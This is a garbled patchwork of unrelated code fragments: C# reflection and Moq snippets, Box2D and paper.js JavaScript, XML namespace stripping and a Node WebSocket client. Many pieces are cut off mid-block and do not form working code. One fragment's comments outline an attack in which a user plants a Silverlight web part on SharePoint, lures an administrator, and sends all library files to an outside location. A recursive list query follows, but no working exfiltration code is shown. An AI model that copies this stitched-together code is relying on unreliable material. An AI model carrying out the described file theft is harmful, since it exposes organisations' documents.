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internal static class AssemblyExtension
#region Methods: public
public static object CreateInstance(this Assembly self, string typeName, params object[] args)
return Activator.CreateInstance(self.GetType(typeName, true), args, null);
namespace ConsoleTest
using System;
using System.Collections;
using System.Collections.Generic;
internal class Program
#region Methods: private
(function () {
function getBodyAtXY(world, x, y, includeStatic) {
var pos = new b2Vec2();
pos.Set(x, y);
var aabb = new b2AABB();
aabb.lowerBound.Set(x - 0.001, y - 0.001);
aabb.upperBound.Set(x + 0.001, y + 0.001);
var maxShapes = 10;
var shapes = [];
var count = world.Query(aabb, shapes, maxShapes);
var mock = new Mock<MemoryStream>();
.Setup(x => x.Read(It.IsAny<byte[]>(), It.IsAny<int>(), It.IsAny<int>()))
.Callback((byte[] array, int offset, int length) => Console.Out.WriteLine(array == null));
mock.Object.Read(new byte[1], 1, 2);
string xml = @"
<root xmlns='' xmlns:h='' xmlns:f=''>
<h:table><h:tr><h:td>Apples</h:td><h:td>Bananas</h:td></h:tr></h:table><f:table><f:name>African Coffee Table</f:name>
XElement x = XElement.Parse(xml);
(from node in x.DescendantsAndSelf()
where node is XElement
from attr in node.Attributes()
where attr.IsNamespaceDeclaration && attr.Name.LocalName == "xmlns"
select attr).All(attr => { attr.Remove(); return true; });
class Program
static void Main(string[] args)
Console.Out.WriteLine("Baking cookies");
Console.Out.WriteLine("Cookies baked");
// A user with the privileges / ability to ...
// - upload a file to a single document library
// - edit one shared page, to add a silverlight webpart
// - lure an administrator to visit said page
// .. can, using this Silverlight app, steal all (document library) files on
// the SharePoint server, and post them to some nasty location.
var q = new CamlQuery { ViewXml = "<View Scope='Recursive'/>" };
IEnumerable<List> lists =
<?xml version="1.0" encoding="utf-8"?>
<Elements xmlns="">
<ListInstance Title="Portfolios"
Description="List containing the available project portfolios">
var circleCenterPt = new paper.Point(150, 300);
var circleRadius = 75;
var sineWaveLength = 300;
var cosineWaveLength = 300;
var sineWaveStep = sineWaveLength/360;
var cosineWaveStep = cosineWaveLength/360;
var angle = 0;
var WebSocket = require('ws')
, ws = new WebSocket('ws://');
ws.on('open', function() {
ws.on('message', function(message) {
console.log('received: %s', message);